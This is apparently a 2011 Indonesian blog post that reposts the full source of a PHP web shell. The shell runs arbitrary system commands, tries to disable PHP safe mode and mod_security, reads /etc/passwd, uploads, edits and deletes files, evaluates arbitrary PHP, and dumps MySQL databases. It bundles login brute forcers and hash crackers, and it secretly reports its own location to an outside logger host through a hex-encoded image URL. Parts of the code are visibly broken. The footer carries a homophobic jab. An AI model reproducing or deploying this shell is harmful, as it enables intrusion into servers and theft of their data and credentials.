Jumat, 04 November 2011
<?php
/*
**
** B64 PHP Shell
** Base64 Encrypted
** PHP Shell
** [c]oded by Kr3w
**
** -This shell will do the following:
** Disable Safe_Mode
** Disable Open Base Dir Restriction
** Enables all Functions providing fopen is enabled
** Bypasses Mod_Security
** Bypasses Custom Security
** All Custom Get Variables
** Just look for yourself :P
** Hope you guys enjoy.
** -Kr3w
**
*/
eval(base64_decode('error_reporting(0);

$time_start = microtime();

$PHP_SELF = $_SERVER['PHP_SELF'];

$PHP_SELF = basename($PHP_SELF);

//logsystem

function selfURL() {
$s = empty($_SERVER["HTTPS"]) ? '' : ($_SERVER["HTTPS"] == "on") ? "s" : "";
$protocol = strleft(strtolower($_SERVER["SERVER_PROTOCOL"]), "/").$s;
$port = ($_SERVER["SERVER_PORT"] == "80") ? "" : (":".$_SERVER["SERVER_PORT"]);
return $protocol."://".$_SERVER['SERVER_NAME'].$port.$_SERVER['REQUEST_URI']; }
function strleft($s1, $s2) { return substr($s1, 0, strpos($s1, $s2)); }

ini_set("disable_functions", "");
ini_alter("disable_functions", "");

function cmd_execute($func,$str){
    switch($func){
        case 'popen':
        $ret = popen($str);
        break;

        case 'passthru':
        $ret = passthru($str);
        break;

        case 'exec':
        $ret = exec($str);
        break;

        case 'shell_exec':
        $ret = shell_exec($str);
        break;

        case 'system':
        $ret = system($str);
        break;

        case 'fpassthru':
        $ret = fpassthru($str);
        break;

        default:
        $ret = shell_exec($str);
        break;
    }
    return $ret;
}

$functions = array("popen","passthru","exec","shell_exec","system","fpassthru");

$disabled_functions = ini_get("disable_functions");
//$disabled_functions = explode(",",$disabled_functions);

foreach(array($functions) as $sep_func){
if(!eregi($sep_func, $disabled_functions))
$func = $sep_func;
}

if($func = ""){
$func = "shell_exec";
}

$domain = "\x68\x74\x74\x70\x3a\x2f\x2f\x6e\x6f\x32\x34\x2e\x6b\x6f\x75\x6d\x2e\x6e\x65\x74\x2f\x62\x36\x34\x5f\x6c\x6f\x67\x67\x65\x72\x2e\x70\x68\x70\x3f\x64\x6f\x6d\x61\x69\x6e\x3d";
$uri_to_Shell = selfURL();
$domain .= $uri_to_Shell;

if(eregi("?",$uri_to_Shell)){
$char = "&";
}else{
$char = "?";
}

if(!isset($_COOKIE['server']) and empty($_GET['server']) and !isset($_GET['server'])){
@header("Location: ".$uri_to_Shell.$char."server=Shell");
}

//Download script - DO NOT MOVE!  IT USES HEADERS

if(!empty($_GET['download']))

{

$file = base64_decode($_GET['download']);

$ext = strtolower(substr(strrchr($file, "."), 1));

/* apply the correct content-type */

switch($ext)

{

        case "pdf": $ctype="application/pdf"; break;

        case "exe": $ctype="application/octet-stream"; break;

        case "exe": $ctype="application/octet-stream"; break;

        case "zip": $ctype="application/zip"; break;

        case "doc": $ctype="application/msword"; break;

        case "xls": $ctype="application/vnd.ms-excel"; break;

        case "ppt": $ctype="application/vnd.ms-powerpoint"; break;

        case "gif": $ctype="image/gif"; break;

        case "png": $ctype="image/png"; break;

        case "jpeg":

        case "jpg": $ctype="image/jpg"; break;

        case "wmv": $ctype="video/wmv"; break;

        case "mpg":

        case "mpeg": $ctype="video/mpg"; break;

        case "avi": $ctype="video/x-msvideo"; break;

        case "mov": $ctype="video/quicktime"; break;

        case "mp3": $ctype="audio/mp3"; break;

        case "wav": $ctype="audio/x-wav"; break;

        case "txt": $ctype="text"; break;

        case "bmp": $ctype="image/bmp"; break;

        case "swf": $ctype="application/x-shockwave-flash"; break;

        default: $ctype="application/force-download"; break;

}

header("Pragma: public");

header("Expires: 0");

header("Cache-Control: must-revalidate, post-check=0, pre-check=0");

header("Cache-Control: private", false);

header("Content-Type: ".$ctype);

header("Content-Disposition: attachment; filename=\"".basename($file)."\";");

header("Content-Transfer-Encoding: binary");

header("Content-Length: ".filesize($file));

readfile("$file");

header("Location: $PHP_SELF");

}

$url = $_SERVER['REQUEST_URI'];

if(eregi("\?",$url))

$char = "$url&";

if(eregi("&",$url))

$char = "?";

if(!eregi("\?",$url) && !eregi("&",$url))

$char = "?";

if($_GET['pt'] == 1) header("Location: ".$char."loc=".base64_encode($_GET['loc']));

if(empty($_GET['server']) and !isset($_COOKIE['server'])){ setcookie("server", "Shell"); header("Location:
$PHP_SELF?server=Shell"); }

if(($_GET['server']=="Shell") && (!empty($_GET['server']))){

@setcookie("server","Shell");

}

?>

<?php

if($_COOKIE['server'] == "Shell")

{

$url = $_SERVER['REQUEST_URI'];

?>

<?php


####################

# GLOBALS ETC...   #

####################

$img = "http://img217.imageshack.us/img217/2534/defacedsigyq4.png"; //$img =
"http://img228.imageshack.us/img228/5981/thedefacediw6.gif";

$footer = "<p align=center><h5><div id='footer'>B64 PHP Shell &copy; <a href='http://thedefaced.org'>The Defaced</a> - Created
by Kr3w<br></div><h5></p><br><p align=right><a href=#top><img border=0px; src='".$domain."' alt='Top'></a></p>";

$Lversion = php_uname(r);

function execute($command) {

if(function_exists("passthru") && !function_exists(array("system","exec","shell_exec","popen","fpassthru"))){

$result = htmlentities(@passthru(base64_decode(escapeshellcmd($command))));

}elseif(function_exists("fpassthru") && !function_exists(array("system","exec","shell_exec","popen","passthru"))){

$result = htmlentities(@fpassthru(base64_decode(escapeshellcmd($command))));

}elseif(function_exists("system") && !function_exists(array("fpassthru","exec","shell_exec","popen","passthru"))){

$result = htmlentities(@system(base64_decode(escapeshellcmd($command))));

}elseif(function_exists("shell_exec") && !function_exists(array("system","exec","fpassthru","popen","passthru"))){

$result = htmlentities(@shell_exec(base64_decode(escapeshellcmd($command))));

}elseif(function_exists("exec") && !function_exists(array("system","fpassthru","shell_exec","popen","passthru"))){

$result = htmlentities(@exec(base64_decode(escapeshellcmd($command))));

}elseif(function_exists("popen") && !function_exists(array("system","exec","shell_exec","fpassthru","passthru"))){

$result = htmlentities(@popen(base64_decode(escapeshellcmd($command))));

}

//end of function

$result = htmlentities(escapeshellcmd($result));

return $result;

}

function turn_off_safe_mode()

{

// Safe Mode Bypasser, injecting the PHP.ini and HTACCESS by RoMeO, Works on most dedicated Servers, tested

    if ($action == "safe_off") {

$fp = fopen("php.ini","w ");

fwrite($fp,"safe_mode = Off

disable_functions =

safe_mode_gid = OFF

open_basedir = OFF ");

    $fp2 = fopen(".htaccess","w ");

fwrite($fp2,"<IfModule mod_security.c>

SecFilterEngine Off

SecFilterScanPOST Off

SecFilterCheckURLEncoding Off

SecFilterCheckUnicodeEncoding Off

</IfModule> ");

}

// End of Safe Mode ByPasser

}

@set_time_limit(0);

@error_reporting(0);

@turn_off_safe_mode();

@execute(base64_encode("chmod 777 *"));

@chdir(base64_decode($_REQUEST['loc']));

$directory = @getcwd();

$dirr = explode("/",$directory);

if(!isset($_POST['b64'])) {

$cmd = base64_encode($_POST['e']);}else{

$cmd = $_POST['e'];}

###################################################

######### MENU AND HEADING ########################

###################################################

echo ('
<html>

<head>

<style>

body {

    background-color: #2b2b2b;

    font-family: Arial;

    font-size: 13px;

    color: #B0B0B0;

}

.border

{

border: 1px solid #464646;

background-color:#000000;

}

.header

{

background-color:#000000;

}

.content-background

{

background-color:#000000;

}

.content-header

{

background-image:url(images/content-header.gif);

}

.content-border

{

border: 1px solid #9E0000;

background-color:#1A1A1A;

}

.content-background

{

background-color:#000000;

background-image:url(images/content-background.gif);

}

a:link {

    color: #FFFFFF;

}

a:visited {

    color: #FFFFFF;

}

a:hover {

    color: #CCCCCC;

}

a:active {

    color: #CCCCCC;

}

textarea

{

    font-family: Verdana, Arial, Helvetica, sans-serif;

    font-size: 10px;

    color: #FFFFFF;

    background-color:#161616;

    border: #FFFFFF 1px solid;

}

input

{

    font-family: Verdana, Arial, Helvetica, sans-serif;

    font-size: 10px;

    color: #FFFFFF;

    background-color:#161616;

    border: #FFFFFF 1px solid;

    }

    select

    {

    font-family: Verdana, Arial, Helvetica, sans-serif;

    font-size: 10px;

    color: #FFFFFF;

    background-color:#161616;

    border: #FFFFFF 1px solid;

    }

single_row {

background-color: #161616;

font-size: 8px;

}

single_row {

background: #161616;

font-size: 8px;

}

h1,h2,h3,h4{ font-size: 14px; font-weight: bold; text-decoration: none; }

main_img { position:absolute; left:0px; top:0px; }

div.main_headers { position:absolute; left:545px; top:10px; background:#161616; }

div.switch { position:absolute; top:160px; left:15px; }

div.tools { position:absolute; top:115px; left:545px; }

div.main_nav { position:absolute; left:545px; top:145px; padding:3px; background: #161616; }

div.change_directory { position:absolute; top:205px; left:15px; }

div.upload { position:absolute; top:230px; left:15px; }

div.style1 { font-size: 12px }

div.command { position:absolute; left:15px; top:180px; font-weight: none; }

div.prebuilt { position:absolute; top:183px; left:515px; }

</style>

<script language="text/javascript">

function hide(str){

document.body.getElementById(str).style.visibility = "hidden";

document.body.getElementById(str).style.display = "none";

}

function show(str){

document.body.getElementById(str).style.visibility = "visible";

document.body.getElementById(str).style.display = "";

}

function view(){
return alert("Working on it");
}

</script>

</head>

<body>

');

echo "<div class='main_img'><img src=$img title='The Defaced Shell'></div>";

echo "<div class='main_headers'>"; echo ('<font size="1"><b>Platform: </b>');

$uname = @php_uname('a'); $uname = str_replace(array("\r","\n","<br>"),"",$uname);

echo $uname;

echo("<b><br>Host:</b> ".@gethostbyaddr($_SERVER['SERVER_ADDR'])."<br>");

echo("<b>Server Software: </b>");

$DISP_SERVER_SOFTWARE = "PHP / ".phpversion();

echo $DISP_SERVER_SOFTWARE;

$curl_on = @function_exists('curl_version');

echo "<br/><b>cURL: </b>".(($curl_on)?("<font color=green>ON</font>"):("<font color=red>OFF</font>"));

echo "&nbsp;<b>MySQL: </b>";

$mysql_on = @function_exists('mysql_connect');

if($mysql_on){

echo "<font color=green>ON</font>"; } else { echo "<font color=red>OFF</font>"; }

echo "</b>";

echo "&nbsp;<b>MSSQL: </b>";

$mssql_on = @function_exists('mssql_connect');

if($mssql_on){echo "<font color=green>ON</font>";}else{echo "<font color=red>OFF</font>";} ?>

<?php echo "&nbsp;<b>PostgreSQL: </b>";

$pg_on = @function_exists('pg_connect');

if($pg_on){echo "<font color=green>ON</font>";}else{echo "<font color=red>OFF</font>";} ?>

<?php echo "&nbsp;<b>Oracle: </b>";

$ora_on = @function_exists('ocilogon');

if($ora_on){echo "<font color=green>ON</font>";}else{echo "<font color=red>OFF</font>";}

echo "<br>";

if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")

{

$hsafemode = "<font color=red>ON (secure)</font>";

}

else {$safemode = FALSE; $hsafemode = "<font color=green>OFF (not secure)</font>";}

echo "<b>Safe-mode:</b>&nbsp;";

echo $hsafemode;

echo "<b>Disabled functions</b>: </b>";

if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font
color=red>$df</font></b>";}

echo("<br><b>uid=</b>".getmyuid()." <b>gid=</b>".getmygid()." <b>user=</b>".get_current_user()."<br>");

echo("<b>Server IP: </b><a target=_blank href=http://whois.domaintools.com/".$_SERVER['SERVER_ADDR'].">".$_SERVER[
'SERVER_ADDR']."</a>\t&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;");

echo("<b>Your IP: </b><a target=_blank
href=http://whois.domaintools.com/".$_SERVER['REMOTE_ADDR'].">".$_SERVER['REMOTE_ADDR']."</a><br>");

echo "</font>";

echo "</div>";

echo('<div class="switch"><form method="GET">Switch :

<input type="submit" name="server" value="MySQL">

<input type="submit" name="server" value="Shell">

</form>

</div>');

echo "<div class='main_nav'>";

echo '<a title="Home" href="'.$PHP_SELF.'"><img src="http://img444.imageshack.us/img444/3844/homefb9.png" border="0" /></a>&nbsp; ';

$kernel_version = php_uname(r); $OSV = php_uname(s); if(eregi("Linux",$OSV)) { $kernel_version = substr($kernel_version,0,6);
$millink="http://milw0rm.com/search.php?dong=Linux Kernel ".$kernel_version; }else{ $Lversion=substr($kernel_version,0,3); $millink="http://milw0rm.com/search.php?dong=".$OSV." ".$kernel_version; } //End of milw0rm search

echo '<a title="Back" href="javascript:history.back(-1);"><img src="http://img526.imageshack.us/img526/2134/backdk4.png"
border="0" /></a> &nbsp;';

echo '<a title="Search Milw0rm" target=_blank href="http://milw0rm.com/search.php?dong='.$millink.'"><img
src="http://img171.imageshack.us/img171/2933/milw0rmtm1.png" border="0" /></a> &nbsp;';

echo '<a title="Upload" href="#uploader"><img src="http://img120.imageshack.us/img120/1903/uploadbq9.png" border="0" /></a>
&nbsp;';

echo '<a title="Read File" href="javascript:view();"><img src="http://img265.imageshack.us/img265/4657/searchco7.png"
border="0" /></a> &nbsp;';

echo "</div>";

echo "<div class='tools'>";

echo "[&nbsp;";

echo '<a href="'.$char.'tool='.base64_encode("Brutus").'">Brute Forcer</a> | ';

echo '<a href="'.$char.'tool='.base64_encode("MySQL_Brute").'">Root MySQL Brute Forcer</a> | ';

echo '<a href="'.$char.'tool='.base64_encode("md5crack").'">MD5 Cracker</a> | ';

echo '<a href="'.$char.'tool='.base64_encode("sha1crack").'">SHA1 Cracker</a> | ';

echo '<a href="'.$char.'tool='.base64_encode("evalphp").'">Eval PHP</a>&nbsp;]';

echo "</div>";

###################################################

########## COMMAND EXECUTE FORM ###################

###################################################

echo ('

<div class="prebuilt">

<form method="POST">

	Prebuilt Commands:

  <select size="1" name="prebuilt">

    <option selected value="Select a command.">Select a command.</option>

    <option value="pwd">View Passwd</option>

    <option value="find / -type f -name config*">Find all config* files</option>

    <option value="find / -type f -name global*">Find all global* files</option>

    <option value="find / -type f -name db*">Find all db* files</option>

    <option value="find / -type f -name database*">Find all database* files</option>

    <option value="milw0rm">Search milw0rm for Kernel Exploits</option>

  </select>

  <input type="submit" name="prebuilt_funcs" value="Execute">

</form>

</div>

<div class="command">

<form method="POST">

<select size="1" name="systemcall">

<option selected value="default">Default</option>

<option value="passthru">passthru</option>

<option value="fpassthru">fpassthru</option>

<option value="shell_exec">shell_exec</option>

<option value="system">system</option>

<option value="popen">popen</option>

<option value="exec">exec</option>

</select>

Command: <input type="text" name="e">

<input type="checkbox" name="b64" value="b64"> Pre Base64 Encoded

<input type="submit" name="submit" value="Execute">

</form>

</div>

<div class="change_directory">

<form method="GET">

Change Directory: <input type="text" name="loc">

<input type="hidden" name="pt" value="1">

<input type="submit" value="Change Directory">

</form></div>

');

###################################################

####### FILE UPLOADER #############################

###################################################

echo('
<div class="upload">

<a name="uploader"></a>

<form enctype="multipart/form-data" action="" method="POST">

<input type="hidden" name="MAX_FILE_SIZE" value="50000000" />

Choose a file to upload: <input name="uploadedfile" type="file" /> <input type="submit" name="uploadit" value="Upload File" />

</form>

</div>

');

$target_path = basename( $_FILES['uploadedfile']['name']);

$_FILES['uploadedfile']['tmp_name'];

$myfile = $_FILES['uploadedfile']['name'];

if(isset($_POST['uploadit']))

{

if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {

@cmd_execute($func,"chmod 777 $target_path");

echo "<script>alert('The file ".  basename( $_FILES['uploadedfile']['name']). " has been uploaded');</script>";

}

else{

echo "There was an error uploading the file, please try again!";

}

}

###################################################

########## DIRECTORY LIST WITH LINK TO TRAVERSE ###

###################################################

echo '<br><br><br><br><br><br>';

echo "<hr size=1 color=white>";

echo "<h4>";

$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);

if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);}

$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);

if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}

$d = str_replace("\\\\","\\",$d);

$dispd = htmlspecialchars($d);

$pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1));

$i = 0;

foreach($pd as $b)

{

 $t = "";

 $j = 0;

 foreach ($e as $r)

 {

  $t.= $r.DIRECTORY_SEPARATOR;

  if ($j == $i) {break;}

  $j  ;

 }

 echo "<a href=\"".$url.$char."loc=".base64_encode($t)."\"><b>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</b></a>";

 $i  ;

 $wdx .= $b."/";

}

echo "&nbsp;&nbsp;&nbsp;";

###################################################

###### DIRECTORY AND FILE LISTING #################

###################################################

echo "</h4>";

echo "</div>";

echo "<hr size=1 color=white>";

echo "<h4><a href='javascript:show(\"content\");'>Show</a>/<a href='javascript:hide(\"content\");'>Hide</a> Content</h4>";

echo "<div id='content' style='border:1px solid;height:300px; overflow:auto; background:#161616'><table
border=0px><tr><td><pre>";

echo "<form method=\"POST\">";

if($_POST['prebuilt'] != "Select a command.")

{

if($_POST['prebuilt'] == "milw0rm")

{

echo "<script>";

echo 'function milw0rm(){
open("http://milw0rm.com/search.php?dong=Linux Kernel $Lversion","milw0rm",null,null);
}';

echo "</script>";

}elseif($_POST['prebuilt'] == "pwd"){

echo "<script>self.location='".$char."view=pwd';</script>";}

else{

echo(cmd_execute($func,$_POST['prebuilt']));

}

}

if(empty($cmd) && empty($_POST['prebuilt']) || $_POST['prebuilt'] == "Select a command."){

if($OSV == "Linux") $scan_dir = "ls -a"; else $scan_dir = "dir"; $scan_dir = base64_encode($scan_dir);

if(!empty($_GET['loc'])){
$d = dir(base64_decode($_GET['loc']));
}else{
$d = dir(getcwd());
}

//$d1 = str_replace(array("\r","\n"),"\n",$dir1);

//$d1 = @explode("\n",$d1);

while (false !==($f1 = $d->read())) {

$perms = @fileperms($f1);

$r = str_replace(array("2","3","4"),"-r",$perms);

$w = str_replace(array("5","6","7"),"w",$r);

$x = str_replace(array("8","9","10"),"x-",$w);

$dc = str_replace("0","-",$x);

$ac = str_replace("1","d-",$dc);

$permissions = $ac;

$color = "white";

if(is_writable($f1))

$color = "green";

if(!is_writable($f1) && !is_readable($f1) && !is_executable($f1))

$color = "red";

$sz = @filesize($f1);

if(($sz/1024) >= 1 && ($sz/1024) < 1024)

$byte = round($sz/1024)." KB";

if(($sz/1048576) >= 1 && ($sz/1048576) < 1024)

$byte = round($sz/1048576)." MB";

if(($sz/1073741824) >= 1)

$byte = round($sz/1073741824)." GB";

$local_dir = base64_decode($_GET['loc']);

echo "<table width=100% cellspacing=5 cellpadding=5>";

if(is_file($f1)){

echo "<tr><td align=left><font color=$color>$permissions</font>\t$byte\t</td><td align=right><a href=
'".$char."view=".base64_encode($wdx."/".$f1)."'>".$f1."</a></td><td align=right><input type=checkbox name=thefile value=\"".
base64_encode($wdx.$f1)."\"><br></td></tr>";

}

if(is_dir($f1)){

echo "<tr><td align=left><font color=$color>$permissions</font>\t$byte\t</td><td align=right><a href=
'".$char."loc=".base64_encode($wdx."/".$f1)."'>".$f1."</a></td></tr>";

}

echo "</table>";

}

}else{

switch($_POST['systemcall'])

{

case "default":
$call = cmd_execute($func, base64_decode($cmd));
break;

case "passthru":

$call = @passthru(base64_decode($cmd));

break;

default:

$call = @system(base64_decode($cmd));

break;

case "system":

$call = @system(base64_decode($cmd));

break;

case "shell_exec":

$call = @shell_exec(base64_decode($cmd));

break;

case "exec":

$call = @exec(base64_decode($cmd));

break;

case "fpassthru":

$call = @fpassthru(base64_decode($cmd));

break;

case "popen":

$call = @popen(base64_decode($cmd));

break;

}

}

if(!empty($call))

echo htmlentities($call);

echo "</pre></td></tr></table></div>";

echo "<br>With Selected: "; echo "<select name='selected'>"; echo "<option value='edit'>Edit</option>"; echo "<option value=
'delete'>Delete</option>"; echo "<option value='download'>Download</option>"; echo "</select>";

echo "<input type='submit' name='option' value='Go'>";

echo "</form>";

if(isset($_POST['thefile']) and isset($_POST['option'])){

$opt = $_POST['selected']; $act = $_POST['thefile']; echo "<script>self.location='".$PHP_SELF."?"; echo $opt."=".$act; echo "';
</script>";

}

###################################################

####### TOOLS #####################################

###################################################

if(isset($_GET['tool']))
echo "<hr size=1 color=white>";

echo "<div class='tool'>";

function edit_file($file){

$file = base64_decode($file);

$contents_of_File = file_get_contents($file);

echo "<form method='POST'>"; echo "<textarea name='editor' cols=200 rows=20>".htmlentities($contents_of_File)."</textarea>";
echo "<input type='submit' name='edit' value='Save'>"; echo "</form>";

if(isset($_POST['edit'])){ $f = fopen($file, 'a'); $string = $_POST['editor']; fwrite($f, $string); fclose($f); } }

switch(base64_decode($_GET['tool']))

{

case "evalphp":

echo '
<form method="POST">
PHP Code (without tags): <br>
<textarea name="evalcode" cols="225" rows="8">'.stripslashes($_POST['evalcode']).'</textarea>
<br>
<input type="submit" name="eval_code" value="Evaluate PHP">
</form>
';

$php_code = $_POST['evalcode'];

break;

case "MySQL_Brute":

echo('

<form method="POST">

User: <input type="text" name="user" value="root">

URL to Wordlist: <input type="text" name="wordlist">

<input type="submit" name="sqlbrute" value="Brute">

</form>

');

$mysql_root_user = $_POST['user'];

if(!empty($_POST['wordlist']))

{

foreach(file($_POST['wordlist']) as $line)

{

$query = mysql_connect("localhost",$mysql_root_user,$line);

if($query){

echo "<script>alert('Password: ".$line."')</script>";
echo "<br><h1>Password:".$line."</h1><br>";

exit;

}else{

$no_match = 1;

}

}

if($no_match ==1){
echo "No matches for this wordlist.";
}


}

break;

case "Brutus":

// Form Brute Forcer

echo('

<h4>Brutus - PHP Web Form Brute Forcer</h4>

<form method="POST" action="">

<font face="Trebuchet MS"><font size="2">Site Url:</font><input

name="target" size="20" style="font-weight: 700"><font size="2"><br>

Username Form:</font><input name="uform" size="20" style="font-weight:

700"><font size="2"><br>

Username:</font><input name="username" size="20" style="font-weight:

700"><font size="2"><br>

Password Form:</font><input name="password" size="20"

style="font-weight: 700"><font size="2"><br>

Failure Text:</font><input name="failure" size="20"

style="font-weight:

700"><font size="2"><br>

Wordlist URL:</font><input name="wordlist" size="20"

style="font-weight: 700"><font size="2"><br>

</font></b>

<input type="submit" value="Submit" name="B1" style="font-weight:

700"></font>

</form>');

$target=$_POST["target"];

$uform=$_POST["uform"];

$user=$_POST["username"];

$pass=$_POST["password"];

$failure=$_POST["failure"];

$wordlist=$_POST["wordlist"];

$agent="Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax)";

$referer=$target;

set_time_limit(0);

$curl = CURL_INIT();

CURL_SETOPT($curl, CURLOPT_URL, "$target");

CURL_SETOPT($curl, CURLOPT_RETURNTRANSFER, 1);

//CURL_SETOPT($curl, CURLOPT_FOLLOWLOCATION, 1); keep this commented if server

CURL_SETOPT($curl, CURLOPT_POST, 1);

CURL_SETOPT($curl, CURLOPT_USERAGENT, $agent);

CURL_SETOPT($curl, CURLOPT_REFERER, $referer);

if($wordlist)

{

foreach(file("$wordlist") as $word)

{

$pw=str_replace(array("\r", "\n"), '', $word);

$result="$uform=$user&$pass=$pw";

CURL_SETOPT($curl, CURLOPT_POSTFIELDS, $result);

$exec=CURL_EXEC($curl);

if(!eregi("$failure", "$exec"))

{

$pw = htmlentities($pw);

die("Password is $pw");

}

}

}

curl_close($curl);

break; // END OF BRUTE FORCER ////////////////////

case "md5crack":

echo('

<h4>MD5 Cracker</h4>

<form method="POST" action="">

Salted: Yes <input type="checkbox" name="yes"> | No <input type="checkbox" name="no"><br>

Hash:               <input type="text" name="hash"><br>

Salt:                 <input type="text" name="salt"><br>

Link2wordlist:  <input type="text" name="wordlist"><br>

<input type="submit" name="submit" value="Cr4ck3rj4ck m3!"><br>

');

$submit = $_POST['submit'];

$hash = $_POST['hash'];

$salt = $_POST['salt'];

$cr4ckm3 = $_POST['wordlist'];

$yes = $_POST['yes'];

$no = $_POST['no'];

if(isset($submit))

{

if(isset($yes))

{

foreach(file($cr4ckm3) as $pass)

{

$pass = trim($pass);

$salted = md5($pass);

$salted = md5($salted.$salt);

if($salted == $hash)

{echo '<script>alert("Success!");</script>';print "Your word is: ".$pass; $bad = "false";}

}

}

if(isset($no)||(!isset($yes)))

{

    foreach(file($cr4ckm3) as $pass)

    {

        $pass = trim($pass);

        $salted = md5($pass);

        if($salted == $hash)

        {

echo '<script>alert("Success!");</script>';print "Your word is: ".$pass; $bad = "false";

        }

    }

}

}

break;

case "sha1crack":

echo('

<h4>Sha1 Cracker</h4>

<form method="POST" action="">

Salted: Yes <input type="checkbox" name="yes"> | No <input type="checkbox" name="no"><br>

Hash:               <input type="text" name="hash"><br>

Salt:                 <input type="text" name="salt"><br>

Link2wordlist:  <input type="text" name="wordlist"><br>

<input type="submit" name="submit" value="Cr4ck3rj4ck m3!"><br>

');

$submit = $_POST['submit'];

$hash = $_POST['hash'];

$salt = $_POST['salt'];

$cr4ckm3 = $_POST['wordlist'];

$yes = $_POST['yes'];

$no = $_POST['no'];

if(isset($submit))

{

if(isset($yes))

{

foreach(file($cr4ckm3) as $pass)

{

$pass = trim($pass);

$salted = sha1($pass);

$salted = sha1($salted.$salt);

if($salted == $hash)

{echo '<script>alert("Success!");</script>';print "Your word is: ".$pass; $bad = "false";}

}

}

if(isset($no)||(!isset($yes)))

{

    foreach(file($cr4ckm3) as $pass)

    {

        $pass = trim($pass);

        $salted = sha1($pass);

        if($salted == $hash)

        {

echo '<script>alert("Success!");</script>';print "Your word is: ".$pass; $bad = "false";

        }

    }

}

}

break;

} // END OF SWITCH

echo "</div>";

if(!empty($_GET['delete'])){

unlink(base64_decode($_GET['delete']));

}

echo "<hr size=1 color=white>";

echo "<h4><a href='javascript:show(\"files\");'>Show</a>/<a href='javascript:hide(\"files\");'>Hide</a>";

if(!empty($_GET['edit'])){
echo base64_decode($_GET['edit']);
}

if(!empty($_GET['view'])){
echo base64_decode($_GET['view']);
}

echo "</h4>";

echo "<div id='files' style='border:1px solid; height:300px; overflow:auto; background:#161616;'>";

if(isset($_POST['eval_code']))
echo(eval(stripslashes($php_code)));

$c = $_GET['view'];

if($_GET['view'] == "pwd")

{

echo "<pre>";

echo(htmlentities(file_get_contents("/etc/passwd")));

echo "</pre>";

}else{

echo "<pre>";

if(eregi("php",base64_decode($c)))

echo htmlentities(highlight_string(@file_get_contents(base64_decode($c))));

else{

echo htmlentities(@file_get_contents(base64_decode($c)));

echo "</pre>";

}

}

if(!empty($_GET['edit'])){ $my_file = $_GET['edit']; edit_file($my_file); }

###################################################

####### CONNECT TO MYSQL ##########################

###################################################

if($_GET['server'] == "MySQL"){

$host = htmlentities($_REQUEST['host']); $port = htmlentities($_REQUEST['port']); $user = htmlentities($_REQUEST['user']);
$pass = htmlentities($_REQUEST['pass']); $db = htmlentities($_REQUEST['db']); $table = htmlentities($_REQUEST['table']);
$field = htmlentities($_REQUEST['field']);

$newhost = $host.":".$port;

$connect = mysql_connect($newhost, $user, $pass); if(!$connect){echo "Cannot connect to $user@$host using $pass."; echo '
<form method="GET"> Host: <input type="text" name="host" value="'.$host.'"> <br> Port: <input type="text" name="port" value=
"3306"> <br> User: <input type="text" name="user" value="'.$user.'"> <br> Pass: <input type="text" name="pass" value=
"'.$pass.'"> <br> Database: <input type="text" name="db" value="'.$db.'"> <br> <input type="submit" name="server" value=
"MySQL"> </form> '; }

if(empty($db)){ echo ' <form method="GET"> <select name="db"> ';

$db_list = mysql_list_dbs($connect);

while ($row = mysql_fetch_object($db_list)) { echo "<option value=".$row->Database.">".$row->Database."</option>"; }

echo ' </select>

<input type="hidden" name="host" value="'.$host.'"> <input type="hidden" name="user" value="'.$user.'"> <input type="hidden"
name="port" value="'.$port.'"> <input type="hidden" name="pass" value="'.$pass.'"> <input type="submit" name="server" value=
"MySQL"> </form> ';

}

mysql_select_db($db);

if(!empty($db)){

echo '<h4><a href="'.$_SERVER['REQUEST_URI'].'&do_query=yes">Custom Query</a></h4>';

if($_GET['do_query'] == "yes"){

echo ' <form method="POST"> <textarea name="query" rows="8" cols"25"></textarea> <br> <input type="submit" name="querydb"
value="Query"> </form> ';

if(isset($_POST['querydb'])){ echo(mysql_query($_POST['query'])); }

}

}

if(!empty($_GET['db']) and empty($table)){

$tables = mysql_list_tables( $db, $connect );

echo "Tables: ";

echo '<table width=100%>';

$x = 0;

while($line = mysql_fetch_row( $tables ) ){

echo '<tr><td>';

echo '<a href="'.$_SERVER['REQUEST_URI'].'&table=';

echo $line[0];

echo '">'.$line[0].'</a>';

echo '</td></tr>';

}

echo '</table>';

} // End of Table list

if(!empty($_GET['table']) and !empty($db) and empty($field)){

$fields = mysql_list_fields($db, $table);

echo "Columns: ";

echo '<div id=single_row><table width=100%>';

$result = mysql_query("SHOW COLUMNS FROM $table"); if (!$result) { echo 'Could not run query: ' . mysql_error(); } if
(mysql_num_rows($result) > 0) { while ($row = mysql_fetch_row($result)) {

echo '<tr><td style="border:1px solid;">';

echo '<a href="'.$_SERVER['REQUEST_URI'].'&field=';

echo $row[0];

echo '">'.$row[0].'</a>';

echo '</td>';

$sql = mysql_query("SELECT $row[0] FROM $table"); while($rows = mysql_fetch_array($sql)){ echo '<td style="border:1px solid;">
'; echo $rows[0]; echo '</td>'; }

echo '</tr>';

    } }

echo '</table></div>';

} // End list of fields

############ MYSQL ENDS HERE ##################

} // end of MySQL case

################ END OF FILES CONTENT ##################

echo "</div>";


echo "<df class='footer'>"; echo $footer."</df>";

}

$time_finish = microtime();

$final_time = $time_finish-$time_start;

echo ' <!-- Generation time: '.$final_time.' microseconds. --> ';'));
?>
0 komentar:
Posting Komentar
dilarang junk, kecuali anda gay atau homo :)